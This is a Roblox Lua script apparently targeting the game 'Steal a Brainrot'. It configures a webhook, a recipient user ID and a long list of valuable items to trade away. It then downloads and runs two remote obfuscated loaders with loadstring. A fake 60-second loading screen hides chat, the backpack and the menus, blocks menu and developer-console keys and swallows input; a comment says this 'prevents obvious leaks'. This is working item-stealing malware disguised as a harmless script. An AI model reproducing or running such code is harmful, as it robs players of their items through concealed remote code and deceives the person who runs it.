getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_5c719cba76b94b549e6f4663931f324a"
getgenv().TARGET_ID = 2525631212
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["La Vacca Saturno Saturnita"] = true,
    ["Perrito Burrito"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Los Tralaleritos"] = true,
    ["Las Tralaleritas"] = true,
    ["GOAT"] = true,
    ["Graipuss Medussi"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Agarrini la Palini"] = true,
    ["Fragola La La La"] = true,
    ["Extinct Matteo"] = true,
    ["Karker Sahur"] = true,
    ["Bunnyman"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Brunito Marsito"] = true,
    ["Guest 666"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["La Grande Combinasion"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["La Karkerkar Combinasion"] = true,
    ["La Vacca Prese Presente"] = true,
    ["Rocco Disco"] = true,
    ["Los Trios"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["La Sahur Combinasion"] = true,
    ["25"] = true,
    ["Cupid Cupid Sahur"] = true,
    ["Ho Ho Ho Sahur"] = true,
    ["Chill Puppy"] = true,
    ["Los Sweethearts"] = true,
    ["Spinny Hammy"] = true,
    ["Las Sis"] = true,
    ["Los Planitos"] = true,
    ["Los Mobilis"] = true,
    ["Los Candies"] = true,
    ["Bacuru and Egguru"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Orcaledon"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Jackorilla"] = true,
    ["Extinct Tralalero"] = true,
    ["La Cucaracha"] = true,
    ["Vulturino Skeletono"] = true,
    ["Zombie Tralala"] = true,
    ["Boatito Auratito"] = true,
    ["Reindeer Tralala"] = true,
    ["Pumpkini Spyderini"] = true,
    ["Frankentteo"] = true,
    ["Santteo"] = true,
    ["La Vacca Jacko Linterino"] = true,
    ["Triplito Tralaleritos"] = true,
    ["Trickolino"] = true,
    ["Giftini Spyderini"] = true,
    ["Love Love Love Sahur"] = true,
    ["Please my Present"] = true,
    ["Telemorte"] = true,
    ["Santa Hotspot"] = true,
    ["Naughty Naughty"] = true,
    ["Cupid Hotspot"] = true,
    ["Noo my Candy"] = true,
    ["Noo my Present"] = true,
    ["Donkeyturbo Express"] = true,
    ["Los 25"] = true,
    ["Noo my Heart"] = true,
    ["Chimnino"] = true,
    ["Fishino Clownino"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Ginger Sekolah"] = true,
    ["Karkerkar Kurkur"] = true,
    ["Sammyni Spyderini"] = true,
    ["Dul Dul Dul"] = true,
    ["Chachechi"] = true,
    ["Blackhole Goat"] = true,
    ["Coffin Tung Tung Tung Sahur"] = true,
    ["Tung Tung Tung Sahur"] = true,
    ["Los Jobcitos"] = true,
    ["Nooo My Hotspot"] = true,
    ["Horegini Boom"] = true,
    ["Quesadilla Crocodila"] = true,
    ["Pot Pumpkin"] = true,
    ["Mi Gatito"] = true,
    ["Burrito Bandito"] = true,
    ["Los Quesadillas"] = true,
    ["Arcadopus"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Rang Ring Bus"] = true,
    ["Los Burritos"] = true,
    ["67"] = true,
    ["Los Cucarachas"] = true,
    ["Los Matteos"] = true,
    ["Los Spyderinis"] = true,
    ["Las Vaquitas Saturnitas"] = true,
    ["Los Karkeritos"] = true,
    ["1x1x1x1"] = true,
    ["Noo my examine"] = true,
    ["Yess my examine"] = true,
    ["Los Chicleteiras"] = true,
    ["Los Mi Gatitos"] = true,
    ["Torrtuginni Dragonfrutini"] = true,
    ["Los Tortus"] = true,
    ["Guerriro Digitale"] = true,
    ["Pot Hotspot"] = true,
    ["Los 67"] = true,
    ["Esok Sekolah"] = true,
    ["Rosetti Tualetti"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Los Combinasionas"] = true,
    ["List List List Sahur"] = true,
    ["Lovin Rose"] = true,
    ["Job Job Job Sahur"] = true,
    ["Chicleteira Bicicleteira"] = true,
    ["Chicliterita bicicliterita"] = true,
    ["Chicleteirina Bicicleteirina"] = true,
    ["To to to Sahur"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)

task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/0fbe1cfb1005a43bbfeb46cd458b7f09.lua"))()
end)
task.spawn(function() 
-- BEST-POSSIBLE "BLOCK SETTINGS" LOADING SCREEN
-- LocalScript in StarterPlayerScripts

local Players = game:GetService("Players")
local StarterGui = game:GetService("StarterGui")
local ContextActionService = game:GetService("ContextActionService")
local UserInputService = game:GetService("UserInputService")

local player = Players.LocalPlayer

-- ===== SETTINGS =====
local DURATION = 60
local UPDATE_RATE = 0.05

-- ===== Helpers =====
local function pcallSetCore(name, value)
	pcall(function()
		StarterGui:SetCore(name, value)
	end)
end

local function safeSetCoreGuiEnabled(coreType, enabled)
	pcall(function()
		StarterGui:SetCoreGuiEnabled(coreType, enabled)
	end)
end

-- ===== Block keys that normally open menus =====
local BLOCK_ACTION = "BLOCK_MENU_KEYS_DURING_LOADING"

local function sinkAction(_, inputState, _)
	return Enum.ContextActionResult.Sink
end

local function enableKeyBlocking()
	-- High priority sink = blocks these keys for most players on PC
	ContextActionService:BindActionAtPriority(
		BLOCK_ACTION,
		sinkAction,
		false,
		999999,
		Enum.KeyCode.Escape,     -- Roblox menu
		Enum.KeyCode.Tab,        -- playerlist focus sometimes
		Enum.KeyCode.B,          -- backpack
		Enum.KeyCode.Backquote,  -- dev console-ish
		Enum.KeyCode.F9,         -- dev console
		Enum.KeyCode.F1, Enum.KeyCode.F2, Enum.KeyCode.F3, Enum.KeyCode.F4
	)
end

local function disableKeyBlocking()
	pcall(function()
		ContextActionService:UnbindAction(BLOCK_ACTION)
	end)
end

-- ===== Hide Roblox UI (prevents obvious leaks) =====
pcallSetCore("TopbarEnabled", false) -- hides menu button
pcallSetCore("ChatActive", false)

safeSetCoreGuiEnabled(Enum.CoreGuiType.Backpack, false)
safeSetCoreGuiEnabled(Enum.CoreGuiType.Chat, false)
safeSetCoreGuiEnabled(Enum.CoreGuiType.PlayerList, false)
pcall(function()
	safeSetCoreGuiEnabled(Enum.CoreGuiType.EmotesMenu, false)
end)

enableKeyBlocking()

-- ===== Create top-layer loading UI =====
local gui = Instance.new("ScreenGui")
gui.Name = "TOP_LOADING_SCREEN"
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false
gui.DisplayOrder = 999999
gui.ZIndexBehavior = Enum.ZIndexBehavior.Global
gui.Parent = player:WaitForChild("PlayerGui")

local background = Instance.new("Frame")
background.Size = UDim2.new(1,0,1,0)
background.BackgroundColor3 = Color3.fromRGB(10,10,10)
background.BorderSizePixel = 0
background.ZIndex = 999999
background.Parent = gui

-- Modal input blocker (eats taps/clicks)
local blocker = Instance.new("TextButton")
blocker.Size = UDim2.new(1,0,1,0)
blocker.BackgroundTransparency = 1
blocker.Text = ""
blocker.AutoButtonColor = false
blocker.ZIndex = 1000000
blocker.Modal = true
blocker.Parent = background

-- Extra: if they try right-click / inputs, eat them
blocker.InputBegan:Connect(function() end)

local loadingText = Instance.new("TextLabel")
loadingText.Size = UDim2.new(1,0,0,80)
loadingText.Position = UDim2.new(0,0,0.43,0)
loadingText.BackgroundTransparency = 1
loadingText.Font = Enum.Font.GothamBold
loadingText.TextColor3 = Color3.fromRGB(255,255,255)
loadingText.TextScaled = true
loadingText.Text = "Loading... 0%"
loadingText.ZIndex = 1000001
loadingText.Parent = background

local barBack = Instance.new("Frame")
barBack.Size = UDim2.new(0.6,0,0,22)
barBack.Position = UDim2.new(0.2,0,0.55,0)
barBack.BackgroundColor3 = Color3.fromRGB(40,40,40)
barBack.BorderSizePixel = 0
barBack.ZIndex = 1000001
barBack.Parent = background
Instance.new("UICorner", barBack).CornerRadius = UDim.new(0,12)

local bar = Instance.new("Frame")
bar.Size = UDim2.new(0,0,1,0)
bar.BackgroundColor3 = Color3.fromRGB(255,20,147)
bar.BorderSizePixel = 0
bar.ZIndex = 1000002
bar.Parent = barBack
Instance.new("UICorner", bar).CornerRadius = UDim.new(0,12)

-- ===== Progress (fast then slow) =====
local start = tick()
while true do
	local elapsed = tick() - start
	local progress = math.clamp(elapsed / DURATION, 0, 1)

	-- ease-out curve: fast start, slow finish
	local eased = 1 - (1 - progress)^3

	local percent = math.floor(eased * 100 + 0.5)
	loadingText.Text = "Loading... " .. percent .. "%"
	bar.Size = UDim2.new(eased, 0, 1, 0)

	if progress >= 1 then break end
	task.wait(UPDATE_RATE)
end

loadingText.Text = "Loading Complete!"
task.wait(0.6)

-- ===== Restore everything =====
gui:Destroy()

disableKeyBlocking()

pcallSetCore("TopbarEnabled", true)
pcallSetCore("ChatActive", true)

safeSetCoreGuiEnabled(Enum.CoreGuiType.Backpack, true)
safeSetCoreGuiEnabled(Enum.CoreGuiType.Chat, true)
safeSetCoreGuiEnabled(Enum.CoreGuiType.PlayerList, true)
pcall(function()
	safeSetCoreGuiEnabled(Enum.CoreGuiType.EmotesMenu, true)
end)
